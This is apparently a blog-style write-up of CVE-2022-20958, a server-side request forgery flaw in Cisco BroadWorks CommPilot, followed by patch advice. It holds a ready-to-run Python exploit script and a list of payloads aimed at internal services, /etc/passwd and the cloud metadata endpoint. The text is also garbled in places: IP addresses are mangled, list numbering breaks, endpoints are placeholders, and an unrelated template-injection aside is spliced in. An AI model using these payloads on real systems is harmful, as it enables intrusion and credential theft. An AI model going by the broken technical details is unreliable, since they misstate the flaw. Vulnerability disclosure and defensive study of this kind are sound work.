CVE-2022-20958 - How the Cisco BroadWorks CommPilot SSRF Allows Hackers To Peek Inside Your Network

A serious security vulnerability, tracked as CVE-2022-20958, was discovered in the web-based management interface of the Cisco BroadWorks CommPilot application. This issue can let hackers poke into networks from the outside, with no need to log in. In this in-depth write-up, we’ll break down what the bug is, how attackers exploit it, and provide simple code snippets demonstrating the attack.

> In short: A bug lets attackers trick the BroadWorks application into making network requests on its behalf (SSRF), leaking internal data.

What is CVE-2022-20958?

CVE-2022-20958 is a Server-Side Request Forgery (SSRF) vulnerability. That means a remote, unauthenticated attacker can convince the BroadWorks CommPilot web app to fetch data from other servers, even internal ones that a normal outside user shouldn't see.

Cause: The problem comes from CommPilot’s web interface not strictly checking (validating) what URLs a user can submit. So, when a hacker sends a sneaky request, the app might happily fetch stuff it should never access.

Impact: If you run Cisco BroadWorks with CommPilot web enabled, you could be leaking sensitive info – like internal files, service data, or even enabling attackers to scan your local network.

Where does the bug live?

The vulnerability is in the HTTP logic of CommPilot’s web portal. Certain endpoints, when given a user-supplied URL, fetch that URL directly, but don’t carefully check it.

For example, an HTTP request like the below

POST /commportal/SomeEndpoint
Host: vulnerable-broadworks-server.com
Content-Type: application/x-www-form-urlencoded

targetUrl=http://localhost:808/secrets

could make the server reach out to localhost:808 (the server itself) and return its contents in the response!

Example Code Snippet: Exploiting the SSRF

Below is a simplified Python script that demonstrates how an attacker could abuse the SSRF with a crafted HTTP request. Adjust the endpoint and parameters for your setup.

import requests

# Change me!
TARGET = "https://vulnerable-broadworks.com/commportal/vulnerableEndpoint";
# The internal resource the attacker wants to reach
SSRF_TARGET = "http://localhost:808/internal_resource";

# Many BroadWorks SSRFs are triggered with POST and data fields
data = {
    "targetUrl": SSRF_TARGET
}

response = requests.post(TARGET, data=data, verify=False)

print("Server’s response from internal service:")
print(response.text)

*This code will make the BroadWorks server connect to localhost:808/internal_resource and pass the results back to the attacker.*

Recon: Attacker discovers organization runs a vulnerable version of CommPilot web interface.

2. Crafted Request: Attacker sends a POST/GET request with input like targetUrl=http://127...1/hidden.

SSRF Trigger: The server fetches the resource from the local or internal network.

4. Data Leak: BroadWorks sends the data back in the HTTP response. This could include secrets, config files, tokens, or more.

Sample malicious payloads

- targetUrl=http://localhost:8081/admin
- targetUrl=http://10...12:920/_cat/indices
- targetUrl=file:///etc/passwd
- targetUrl=https://169.254.169.254/latest/meta-data/

That last one is the infamous AWS metadata service – attackers often test this to steal cloud credentials!

Why Does This Happen?

The interface directly uses user-supplied input without proper filtering or sanitization. Specifically, parameters like targetUrl or similar are handed off to server-side request logic with only shallow validation, allowing attackers to supply anything they like—IPs, hostnames, even file or special URIs.

For example, strings like {{value}} or its encoded form "%7b%7bvalue%7d%7d" may be improperly handled, sometimes letting an attacker sneak past naive input controls.

POST /commportal/SomeVulnerableEndpoint
Host: victim.com

targetUrl={{value}}

Or encoded

targetUrl=%7b%7bvalue%7d%7d

Scan local networks (port scan, service enumeration)

- Steal internal files (file:/// SSRF)

Bypass firewalls using BroadWorks as a proxy

This is especially bad because attackers only need to reach the web portal – *no sign-in required*.

Mitigation

Cisco has released a patch. Always keep BroadWorks and CommPilot web up to date! See Cisco’s advisory:

- Cisco Security Advisory – cisco-sa-bworks-ssrf-IhmrSC3T
- NVD entry for CVE-2022-20958

References

- Cisco Advisory: cisco-sa-bworks-ssrf-IhmrSC3T
- NVD Entry: CVE-2022-20958
- Cisco BroadWorks SSRF writeup (external)

Final Thoughts

CVE-2022-20958 highlights the dangers of overlooking user input validation in critical management interfaces. SSRF bugs like this can allow attackers to jump the firewall and peek at sensitive data.

If you use Cisco BroadWorks CommPilot, check your version now and patch promptly!

*Stay vigilant, test your internal web apps, and always filter any user-supplied URLs!*

Timeline

Published on: 11/04/2022 18:15:00 UTC
Last modified on: 11/08/2022 15:52:00 UTC